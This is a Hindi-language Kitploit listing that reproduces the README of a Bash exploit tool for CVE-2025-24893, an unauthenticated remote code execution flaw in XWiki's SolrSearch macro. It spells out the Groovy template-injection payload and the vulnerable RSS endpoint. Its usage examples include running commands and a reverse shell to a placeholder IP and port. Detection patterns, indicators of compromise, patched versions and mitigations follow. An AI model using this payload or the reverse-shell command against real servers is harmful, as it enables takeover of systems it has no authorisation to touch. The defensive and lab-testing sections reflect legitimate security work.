Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — CVE-2025-24893 के लिए Bash शोषण, XWiki Platform में SolrSearch मैक्रो के माध्यम से टेम्पलेट इंजेक्शन द्वारा एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता। | Kitploit
उपकरण/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

CVE-2025-24893 के लिए Bash शोषण, XWiki Platform में SolrSearch मैक्रो के माध्यम से टेम्पलेट इंजेक्शन द्वारा एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

मुझे ज्ञान खरीदें

XWiki Platform अनधिकृत RCE शोषण

अवलोकन

यह स्क्रिप्ट CVE-2025-24893 से प्रभावित XWiki Platform संस्करणों को लक्षित करने वाले एक शोषण का पुनर्निर्मित Bash कार्यान्वयन है। यह SolrSearch मैक्रो में टेम्पलेट इंजेक्शन दोष के माध्यम से अनधिकृत दूरस्थ कोड निष्पादन कमजोरी का लाभ उठाता है, जो हमलावरों को मनमाना Groovy कोड निष्पादित करने की अनुमति देता है।

मूल Python शोषण कार्यान्वयन विभिन्न सुरक्षा शोधकर्ताओं द्वारा बनाए गए थे और यहाँ Bash उपयोगकर्ताओं के लिए सरलीकृत निष्पादन और बेहतर उपयोगिता के साथ अनुकूलित किए गए हैं।

कमजोरी विवरण

  • खोजकर्ता: John Kwak (Trend Micro का Zero Day Initiative)
  • CVE: CVE-2025-24893
  • CVSS स्कोर: 9.8 (गंभीर)
  • संदर्भ:
    • XWiki आधिकारिक सुरक्षा सलाहकार (GHSA-rr6p-3pfg-562j)
    • CISA ज्ञात शोषित कमजोरियाँ सूची
    • VulnCheck - XWiki CVE-2025-24893 वास्तविक दुनिया में शोषित
    • OffSec ब्लॉग - XWiki में अनधिकृत RCE
  • विवरण: यह कमजोरी XWiki Platform के SolrSearch मैक्रो में अनुचित इनपुट सैनिटाइजेशन के कारण उत्पन्न होती है। मैक्रो RSS मीडिया एंडपॉइंट के माध्यम से एक्सेस करने पर text पैरामीटर में उपयोगकर्ता-आपूर्त इनपुट को ठीक से मान्य और सैनिटाइज़ करने में विफल रहता है, जिससे हमलावर बिना प्रमाणीकरण के रेंडरिंग पाइपलाइन में दुर्भावनापूर्ण Groovy कोड इंजेक्ट कर सकते हैं।

प्रभावित और पैच किए गए संस्करण

प्रभावित संस्करण

  • XWiki Platform: 5.3-milestone-2 से 15.10.10 तक
  • XWiki Platform: 16.0.0-rc-1 से 16.4.0 तक

पैच किए गए संस्करण

  • XWiki 15.10.11 या बाद का
  • XWiki 16.4.1 या बाद का
  • XWiki 16.5.0RC1 या बाद का

विशेषताएँ

  • अनधिकृत RCE: बिना प्रमाणीकरण के मनमाना सिस्टम कमांड निष्पादित करें।
  • CSRF टोकन बाईपास: CSRF टोकन की आवश्यकता के बिना टेम्पलेट इंजेक्शन का शोषण करता है।
  • पृष्ठभूमि निष्पादन: लक्ष्य सर्वर पर कमांड को एसिंक्रोनस रूप से चलाता है।
  • सरल कमांड-लाइन इंटरफ़ेस: न्यूनतम निर्भरता के साथ उपयोग में आसान Bash स्क्रिप्ट।

पूर्वापेक्षाएँ

  • निर्भरताएँ:
    • curl: HTTP अनुरोध भेजने के लिए।
    • jq: पेलोड को URL-एन्कोड करने के लिए।
    • Bash शेल।
  • परीक्षित वातावरण: Bash के साथ Linux OS.

उपयोग

निष्पादन अनुमतियाँ प्रदान करें:

root@kitploit:~
chmod +x CVE-2025-24893

स्क्रिप्ट को आवश्यक तर्कों के साथ चलाएँ:

root@kitploit:~
./CVE-2025-24893 <target_url> <command>

पैरामीटर

पैरामीटरविवरण
<target_url>लक्ष्य XWiki URL (जैसे, http://example.com या https://xwiki.example.org)। प्रोटोकॉल वैकल्पिक है।
<command>लक्ष्य सर्वर पर निष्पादित करने के लिए सिस्टम कमांड।

उदाहरण

जाँचें कि लक्ष्य कमजोर है या नहीं (id कमांड निष्पादित करें):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"

सिस्टम जानकारी प्राप्त करें:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"

परीक्षण फ़ाइल बनाएँ:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"

रिवर्स शेल (अपना IP और पोर्ट डालें):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"

स्क्रिप्ट कार्यप्रवाह

  1. कमांड-लाइन तर्क पार्सिंग:

    • सत्यापित करता है कि लक्ष्य URL और कमांड दोनों प्रदान किए गए हैं।
    • यदि कोई प्रोटोकॉल निर्दिष्ट नहीं है तो http:// जोड़कर URL को सामान्यीकृत करता है।
  2. पेलोड निर्माण:

    • एक Groovy कोड पेलोड बनाता है जो .execute() का उपयोग करके निर्दिष्ट कमांड को निष्पादित करता है।
    • पेलोड को XWiki मैक्रो सिंटैक्स में लपेटता है: }}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
  3. URL एन्कोडिंग:

    • उचित HTTP ट्रांसमिशन के लिए jq का उपयोग करके पेलोड को URL-एन्कोड करता है।
  4. शोषण:

    • कमजोर SolrSearch एंडपॉइंट पर HTTP GET अनुरोध भेजता है: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<encoded_payload>
    • कमांड लक्ष्य सर्वर पर पृष्ठभूमि में निष्पादित होता है।

तकनीकी विवरण

शोषण तंत्र

शोषण श्रृंखला निम्नानुसार काम करती है:

  1. टेम्पलेट इंजेक्शन: हमलावर XWiki मैक्रो सिंटैक्स में लिपटे Groovy कोड वाला एक दुर्भावनापूर्ण पेलोड तैयार करता है।
  2. एंडपॉइंट लक्ष्यीकरण: पेलोड कमजोर SolrSearch RSS एंडपॉइंट पर भेजा जाता है।
  3. कोड निष्पादन: इंजेक्ट किया गया Groovy कोड बिना प्रमाणीकरण के सर्वर-साइड निष्पादित होता है।
  4. सिस्टम से समझौता: हमलावर XWiki एप्लिकेशन के विशेषाधिकारों के साथ मनमाना कोड निष्पादन प्राप्त करता है।

पेलोड संरचना

root@kitploit:~
}}}{{async async=false}}{{groovy}}'<command>'.execute();{{/groovy}}{{/async}}
  • }}} - किसी भी मौजूदा मैक्रो संदर्भ को बंद करता है
  • {{async async=false}} - समकालिक निष्पादन सुनिश्चित करता है
  • {{groovy}}...{{/groovy}} - दुर्भावनापूर्ण Groovy कोड को लपेटता है
  • '<command>'.execute(); - निर्दिष्ट सिस्टम कमांड को निष्पादित करता है

प्रूफ ऑफ कॉन्सेप्ट

कमजोर वातावरण सेटअप

परीक्षण उद्देश्यों के लिए, आप Docker का उपयोग करके एक कमजोर XWiki इंस्टेंस सेट कर सकते हैं:

root@kitploit:~
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

शोषण डेमो

root@kitploit:~
# XWiki शुरू होने तक प्रतीक्षा करें (1-2 मिनट लग सकते हैं)
./CVE-2025-24893 http://localhost:8080 "whoami"

प्रभाव

इस कमजोरी के सफल शोषण से एक अनधिकृत हमलावर निम्नलिखित कर सकता है:

  • सर्वर पर मनमाना सिस्टम कमांड निष्पादित करना
  • संवेदनशील डेटा पढ़ना, संशोधित करना या हटाना
  • पूरे XWiki इंस्टॉलेशन से समझौता करना
  • नेटवर्क पर अन्य सिस्टम पर जाना
  • क्रिप्टोकरेंसी माइनर या अन्य मैलवेयर तैनात करना
  • स्थायी बैकडोर एक्सेस स्थापित करना

वास्तविक दुनिया में शोषण

CISA और कई सुरक्षा विक्रेताओं के अनुसार:

  • सक्रिय शोषण: CVE-2025-24893 वास्तविक दुनिया में सक्रिय रूप से शोषित किया जा रहा है
  • हमला अभियान: VulnCheck ने क्रिप्टोकरेंसी माइनर तैनात करने वाली दो-चरणीय हमला श्रृंखलाओं का पता लगाया
  • CISA KEV सूची: 30 अक्टूबर 2025 को ज्ञात शोषित कमजोरियों की सूची में जोड़ा गया
  • व्यापक स्कैनिंग: कमजोर इंस्टेंसेस के लिए बड़े पैमाने पर इंटरनेट-व्यापी स्कैनिंग

पता लगाना और शमन

पता लगाना

SolrSearch एंडपॉइंट पर संदिग्ध अनुरोधों की निगरानी करें:

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

निम्नलिखित पैटर्न वाले अनुरोधों पर ध्यान दें:

  • {{groovy}}
  • {{async}}
  • .execute()
  • उपरोक्त के URL-एन्कोडेड वेरिएशन

समझौते के संकेतक (IoCs)

  • XWiki एप्लिकेशन उपयोगकर्ता द्वारा उत्पन्न अप्रत्याशित प्रक्रियाएँ
  • /tmp या अन्य लिखने योग्य निर्देशिकाओं में नई फ़ाइलें
  • अज्ञात IPs के लिए आउटबाउंड नेटवर्क कनेक्शन
  • क्रिप्टोकरेंसी माइनिंग प्रक्रियाएँ (उच्च CPU उपयोग)

शमन

  1. XWiki अपग्रेड करें पैच किए गए संस्करण पर:

    • संस्करण 15.10.11 या बाद का
    • संस्करण 16.4.1 या बाद का
    • संस्करण 16.5.0RC1 या बाद का
  2. अस्थायी वर्कअराउंड लागू करें (यदि तत्काल पैचिंग संभव नहीं है):

    • वेब एप्लिकेशन फायरवॉल (WAF) के माध्यम से SolrSearch एंडपॉइंट तक पहुँच प्रतिबंधित करें
    • यदि आवश्यक नहीं है तो SolrSearch मैक्रो को अक्षम करें
    • एक्सपोज़र सीमित करने के लिए नेटवर्क सेगमेंटेशन लागू करें
  3. समझौते की निगरानी करें:

    • शोषण प्रयासों के लिए लॉग की समीक्षा करें
    • अनधिकृत फ़ाइल संशोधनों की जाँच करें
    • क्रिप्टोकरेंसी माइनर और बैकडोर के लिए स्कैन करें

सीमाएँ

  • कमांड पृष्ठभूमि में निष्पादित होते हैं; आउटपुट तुरंत दिखाई नहीं दे सकता है।
  • कमांड निष्पादन के सत्यापन के लिए साइड-चैनल विधियों (जैसे, फ़ाइलें बनाना, नेटवर्क कनेक्शन) की आवश्यकता होती है।
  • लक्ष्य में SolrSearch मैक्रो सक्षम होना चाहिए (डिफ़ॉल्ट कॉन्फ़िगरेशन)।

श्रेय

  • कमजोरी खोजकर्ता: John Kwak (Trend Micro का Zero Day Initiative)
  • मूल Python शोषण लेखक: विभिन्न सुरक्षा शोधकर्ता
  • अनुकूलित स्क्रिप्ट: [0xdtc] द्वारा पुनर्निर्मित, BASH में निर्मित

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। जिम्मेदारी से उपयोग करें।

परीक्षण से पहले आपके पास सिस्टम स्वामी से स्पष्ट लिखित अनुमति होनी चाहिए।

इस उपकरण के लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। उपयोगकर्ता यह सुनिश्चित करने के लिए पूरी तरह से जिम्मेदार हैं कि उनके पास उचित प्राधिकरण है और वे सभी लागू कानूनों और विनियमों का पालन करते हैं।

टूल डाउनलोड करें